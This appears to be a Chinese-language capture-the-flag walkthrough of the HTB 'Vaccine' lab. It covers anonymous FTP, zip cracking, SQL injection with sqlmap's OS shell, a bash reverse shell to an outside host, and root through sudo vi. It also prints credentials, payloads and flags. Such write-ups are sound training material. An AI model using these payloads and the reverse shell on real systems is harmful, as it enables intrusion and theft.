# Task 1
Q:Besides SSH and HTTP, what other service is hosted on this box?
nmap 直接扫描
┌──(root💀kali)-[~/桌面] | |
└─# nmap -sV -Pn 10.129.75.167 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 10:01 CST | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 | |
Nmap scan report for 10.129.75.167 | |
Host is up (0.70s latency). | |
Not shown: 997 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 3.0.3 | |
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0) | |
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | |
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 106.77 seconds |
其中的 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
是因为我的网络不好而产生的报错,超时平均方差比较大。
参考资料:
A: ftp
# Task 2
Q:This service can be configured to allow login with any password for specific username. What is that username?
A:anonymous
# Task 3
Q:What is the name of the file downloaded over this service?
连接到 FTP 上
┌──(root💀kali)-[~/桌面] | |
└─# ftp 10.129.75.167 | |
Connected to 10.129.75.167. | |
220 (vsFTPd 3.0.3) | |
Name (10.129.75.167:root): anonymous | |
331 Please specify the password. | |
Password: | |
230 Login successful. | |
Remote system type is UNIX. | |
Using binary mode to transfer files. | |
ftp> ls | |
200 PORT command successful. Consider using PASV. | |
150 Here comes the directory listing. | |
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip | |
226 Directory send OK. | |
ftp> get backup.zip | |
local: backup.zip remote: backup.zip | |
200 PORT command successful. Consider using PASV. | |
150 Opening BINARY mode data connection for backup.zip (2533 bytes). | |
226 Transfer complete. | |
2533 bytes received in 0.27 secs (9.2379 kB/s) |
可以看到里面有个 backup.zip 文件
A:backup.zip
# Task 4
Q:What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
john the rapper
是一个用于破解各种密码的软件。
首先需要使用 zip2john 生成 hash
然后进行破解
┌──(root💀kali)-[~/桌面] | |
└─# zip2john backup.zip > hash | |
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8 | |
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8 | |
NOTE: It is assumed that all files in each archive have the same password. | |
If that is not the case, the hash may be uncrackable. To avoid this, use | |
option -o to pick a file at a time. | |
┌──(root💀kali)-[~/桌面] | |
└─# john hash | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (PKZIP [32/64]) | |
Will run 8 OpenMP threads | |
Proceeding with single, rules:Single | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
Almost done: Processing the remaining buffered candidate passwords, if any. | |
Proceeding with wordlist:/usr/share/john/password.lst | |
741852963 (backup.zip) | |
1g 0:00:00:00 DONE 2/3 (2022-05-08 10:12) 6.250g/s 531356p/s 531356c/s 531356C/s 123456..faithfaith | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
密码:741852963
A: 741852963
# Task 5
Q:What is the password for the admin user on the website?
解压压缩包
┌──(root💀kali)-[~/桌面] | |
└─# unzip backup.zip | |
Archive: backup.zip | |
[backup.zip] index.php password: | |
inflating: index.php | |
inflating: style.css |
查看 index.php
能够看到密码的哈希值 2cb42f8734ea607eefed3b70af13bbd3
<!DOCTYPE html> | |
<?php | |
session_start(); | |
if(isset($_POST['username']) && isset($_POST['password'])) { | |
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") { | |
$_SESSION['login'] = "true"; | |
header("Location: dashboard.php"); | |
} | |
} | |
?> |
在线搜索 md5
得到结果: qwerty789
A: qwerty789
# Task 6
Q:What option can be passed to sqlmap to try to get command execution via the sql injection?
用上面的账号密码登录进去发现是一个查询,手动检测发现有注入
http://10.129.75.167/dashboard.php?search=%27AND%201=1%20-- | |
http://10.129.75.167/dashboard.php?search=%27AND%202=1%20-- |
直接用 sqlmap 跑咯
由于是管理员权限。那么跑的时候一定要添加 cookie 信息
我的是:```PHPSESSID=462ehhjmskjo99v8ld1m3d470b
获得shell:
```cpp
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u 10.129.75.167/dashboard.php?search=1 --cookie=PHPSESSID=462ehhjmskjo99v8ld1m3d470b --risk=3 --level=3 --random-agent --os-shell
___
__H__
___ ___[.]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:40:20 /2022-05-08/
[10:40:20] [INFO] fetched random HTTP User-Agent header value 'Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[10:40:20] [INFO] testing connection to the target URL
[10:40:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:22] [INFO] testing if the target URL content is stable
[10:40:23] [INFO] target URL content is stable
[10:40:23] [INFO] testing if GET parameter 'search' is dynamic
[10:40:24] [WARNING] GET parameter 'search' does not appear to be dynamic
[10:40:25] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[10:40:26] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:26] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] n
[10:40:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:41:38] [INFO] GET parameter 'search' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[10:41:38] [INFO] testing 'Generic inline queries'
[10:41:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:40] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[10:41:40] [INFO] testing 'PostgreSQL inline queries'
[10:41:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:53] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[10:41:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:42:05] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[10:42:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:42:07] [WARNING] reflective value(s) found and filtering out
[10:42:12] [INFO] target URL appears to have 5 columns in query
[10:42:15] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[10:42:15] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: search=-7712' OR 5759=5759-- iRnE
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=1' AND 8843=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8843=8843) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)-- XdGz
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=1';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=1' AND 1588=(SELECT 1588 FROM PG_SLEEP(5))-- kJxc
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(CHR(102)||CHR(75)||CHR(100)||CHR(90)||CHR(89)||CHR(117)||CHR(66)||CHR(81)||CHR(97)||CHR(84)||CHR(101)||CHR(102)||CHR(110)||CHR(108)||CHR(122)||CHR(81)||CHR(102)||CHR(108)||CHR(106)||CHR(108)||CHR(65)||CHR(86)||CHR(77)||CHR(86)||CHR(71)||CHR(72)||CHR(105)||CHR(72)||CHR(99)||CHR(100)||CHR(101)||CHR(107)||CHR(88)||CHR(79)||CHR(114)||CHR(66)||CHR(81)||CHR(75)||CHR(74)||CHR(114))||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113))-- GBDO
---
[10:42:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[10:43:07] [INFO] fingerprinting the back-end DBMS operating system
[10:43:11] [INFO] the back-end DBMS operating system is Linux
[10:43:13] [INFO] testing if current user is DBA
[10:43:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[10:43:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
A: --os-shell
# Task 7
Q:What program can the postgres user run as root using sudo?
root flag 有过程
A:vi
# Flag
在前面拿到了 os-shell 之后我们开启 nc 监听
┌──(root💀kali)-[~] | |
└─# nc -lvnp 4444 | |
listening on [any] 4444 ... |
os-shell 反弹链接
os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.86/4444 0>&1" |
bash -c 代表用 bash 来执行一段命令,参数 c 后面加上一段需要执行的命令
bash -i 代表建立一个交互式的 shell
这个我们经常见到,例如我们常用 echo “hello world”>hello.txt,这个代表将将字符串写入一个文件
那么 &> 又代表什么呢?我们先来了解一下 shell 中的三个文件描述符(file descriptor)。
- 0 是一个文件描述符,表示标准输入(stdin),即在 shell 中我们输入的字符。
- 1 是一个文件描述符,表示标准输出(stdout),即在 shell 中系统输出的字符。
- 2 是一个文件描述符,表示标准错误(stderr),即 shell 中报错输出的字符。
在 > 前面的 & 代表文件描述符 1 和 2,也就是标准输出和标准错误信息,这里是把交互式 bash 中的标准输出信息和报错信息都写入/dev/tcp/10.10.16.86/4444
文件中。
这里的/dev/tcp
是一个设备文件,并不是一个真正的文本文件。它的作用是建立 tcp 连接,在这里是与 10.10.16.86 的 4444 端口建立连接。
0>&1 这代表 bash 中的标准输入信息写入文件管道 1(stdout),这里的 & 的意思与前面的不同,这里 & 与 1 是一个整体,&1 代表文件描述符 1(stdout)。而前面已经通过命令 &> 将文件管道 1(stdout)的数据写入了 /dev/tcp,所以这里的文件管道 0 的数据也会跟随文件管道 1 写入 /dev/tcp。这样就将 bash -i 中的全部数据传输到了本地监听程序中,也就建立一个 shell。
nc 就上线了
# user flag
postgres@vaccine:/var/lib/postgresql/11/main$ cd ~ | |
cd ~ | |
postgres@vaccine:/var/lib/postgresql$ ls | |
ls | |
11 | |
user.txt | |
postgres@vaccine:/var/lib/postgresql$ cat user.txt | |
cat user.txt | |
ec9b13ca4d6229cd5cc1e09980965bf7 |
FLAG:```ec9b13ca4d6229cd5cc1e09980965bf7
# root flag
去网站根目录翻一翻
```cpp
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php | |
cat dashboard.php |
得到数据库账号密码
<?php | |
session_start(); | |
if($_SESSION['login'] !== "true") { | |
header("Location: index.php"); | |
die(); | |
} | |
try { | |
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); | |
} |
尝试下 ssh 登录看看,不一定登的上去
┌──(root💀kali)-[~/桌面] | |
└─# ssh postgres@10.129.75.167 | |
The authenticity of host '10.129.75.167 (10.129.75.167)' can't be established. | |
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo. | |
This key is not known by any other names | |
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | |
Warning: Permanently added '10.129.75.167' (ED25519) to the list of known hosts. | |
postgres@10.129.75.167's password: | |
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64) |
进去了,那我们想办法提升管理员权限咯
查看一下能使用的高级权限命令
postgres@vaccine:~$ sudo -l | |
Matching Defaults entries for postgres on vaccine: | |
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", | |
env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
mail_badpass | |
User postgres may run the following commands on vaccine: | |
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf |
可以看到能以 root 身份使用 vi 打开 /etc/postgresql/11/main/pg_hba.conf
这个文件
而且 vi 可以直接执行命令的,那么我们用 vi 打开这个文件,然后用命令提权咯
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf | |
//vi 中命令:!/bin/bash | |
root@vaccine:/var/lib/postgresql# |
然后我们去找 flag 啦
root@vaccine:/var/lib/postgresql# cd ~ | |
root@vaccine:~# ls | |
pg_hba.conf root.txt snap | |
root@vaccine:~# cat root.txt | |
dd6e058e814260bc70e9bbdef2715849 |
flag: dd6e058e814260bc70e9bbdef2715849
